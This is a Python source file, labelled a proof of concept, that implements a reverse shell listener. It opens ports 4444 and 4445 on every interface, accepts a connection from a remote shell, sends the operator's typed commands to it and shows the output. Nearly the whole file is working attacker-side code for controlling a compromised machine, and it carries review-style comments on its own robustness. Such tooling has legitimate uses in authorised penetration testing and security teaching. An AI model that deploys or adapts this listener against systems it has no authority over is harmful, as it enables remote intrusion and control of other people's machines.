POC / rev_shell.py PY
"""
Reverse Shell Listener
Author : KylVGoi

Note:
This listener handles bidirectional communication:
- Port 4444 : stdin sent to the remote shell
- Port 4445 : stdout received from the remote shell

TODO: make it more intuitive with a menu and fix the quit command.
"""

import socket
import sys
import threading


# Bind address. The empty string makes bind() listen on every local interface,
# so both ports are reachable from any host that can route to this machine;
# set a specific address here to narrow that.
host = ""

# Command channel: local stdin is sent to the remote shell over this port.
port_in = 4444

# Output channel: the remote shell's stdout is received on this port.
port_out = 4445


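def create_socket(port):
    """
    Create a TCP/IPv4 listening socket bound to the module-level ``host``.

    Args:
        port: TCP port number to bind.

    Returns:
        The bound socket, already in the listening state. The caller owns it
        and is responsible for closing it.

    Raises:
        OSError: if bind() or listen() fails (port in use, no permission, ...).
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.bind((host, port))
        s.listen(5)
    except OSError:
        # Do not leak the descriptor when the port cannot be claimed.
        s.close()
        raise
    print(f"Listening on port {port}...")
    return s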

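def handle_input(client_sock):
    """
    Send commands from local input to the remote shell.

    Meant to run as a worker thread. Each non-empty line read from stdin is
    stripped, terminated with a newline and written to ``client_sock`` as
    UTF-8. The literal command ``quit`` closes ``client_sock`` and asks the
    main thread to shut the program down; a send/receive error does the same
    after printing the error. End-of-file on stdin just ends this handler.

    Args:
        client_sock: connected socket used as the command channel.
    """
    # Function-scope import: only this handler needs to wake the main thread.
    import _thread

    try:
        while True:
            try:
                cmd = input("shell ▄︻デ══━一💥 > ").strip()
            except EOFError:
                # stdin is gone: stop sending but leave the session running.
                return
            if cmd == "quit":
                client_sock.close()
                break
            if cmd:
                client_sock.sendall(cmd.encode() + b"\n")
    except Exception as e:
        print(f"Input handler error: {e}")

    # sys.exit() in a worker thread raises SystemExit in that thread only, so
    # the process would keep running. Raise KeyboardInterrupt in the main
    # thread instead; it is the one that owns and closes the sockets.
    _thread.interrupt_main()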

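def handle_output(client_sock):
    """
    Display stdout received from the remote shell.

    Reads ``client_sock`` in chunks of up to 4096 bytes until the peer closes
    the connection, decoding the stream as UTF-8 (undecodable bytes are
    dropped) and writing each chunk to stdout exactly once.

    Args:
        client_sock: connected socket used as the output channel.
    """
    # Function-scope import: an incremental decoder keeps a multi-byte
    # character that is split across two recv() calls intact instead of
    # dropping it.
    import codecs

    decoder = codecs.getincrementaldecoder("utf-8")(errors="ignore")
    try:
        while True:
            data = client_sock.recv(4096)
            if not data:
                break
            # NOTE(review): these bytes are chosen by the peer and reach the
            # terminal unfiltered, so any control/escape sequences in them are
            # interpreted by the terminal emulator. Filter C0 controls other
            # than \n, \r and \t if the displayed transcript must be trusted.
            sys.stdout.write(decoder.decode(data))
            sys.stdout.flush()
    except Exception as e:
        print(f"Output handler error: {e}")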

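def main():
    """
    Accept one peer on each port and relay stdin/stdout until the session ends.

    The first connection to arrive on ``port_in`` becomes the command channel
    and the first on ``port_out`` becomes the output channel. Neither is
    authenticated, so the printed peer addresses are the only indication of
    who connected. The session ends when the output channel is closed by the
    peer or when KeyboardInterrupt is raised in the main thread.
    """
    client_in = client_out = None
    try:
        # The listeners serve a single accept() each. Closing them as soon as
        # both channels are up means no further connections are queued on the
        # open ports for the rest of the session.
        with create_socket(port_in) as s_in, create_socket(port_out) as s_out:
            client_in, addr_in = s_in.accept()
            print(f"Connection established for input from {addr_in}")

            client_out, addr_out = s_out.accept()
            print(f"Connection established for output from {addr_out}")

        # Thread to send the commands (stdin --> client)
        writer = threading.Thread(target=handle_input, args=(client_in,), daemon=True)
        # Thread to receive the output (client --> stdout)
        reader = threading.Thread(target=handle_output, args=(client_out,), daemon=True)
        writer.start()
        reader.start()

        # Block on the reader instead of spinning in an empty loop. The short
        # timeout keeps the wait responsive to KeyboardInterrupt.
        while reader.is_alive():
            reader.join(timeout=0.5)
    except KeyboardInterrupt:
        print("Closing connections...")
    finally:
        # Release the peer sockets on every exit path, not only on Ctrl-C.
        for sock in (client_in, client_out):
            if sock is not None:
                sock.close()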

# Start the listener only when this file is executed as a script, not on import.
if __name__ == "__main__":
    main()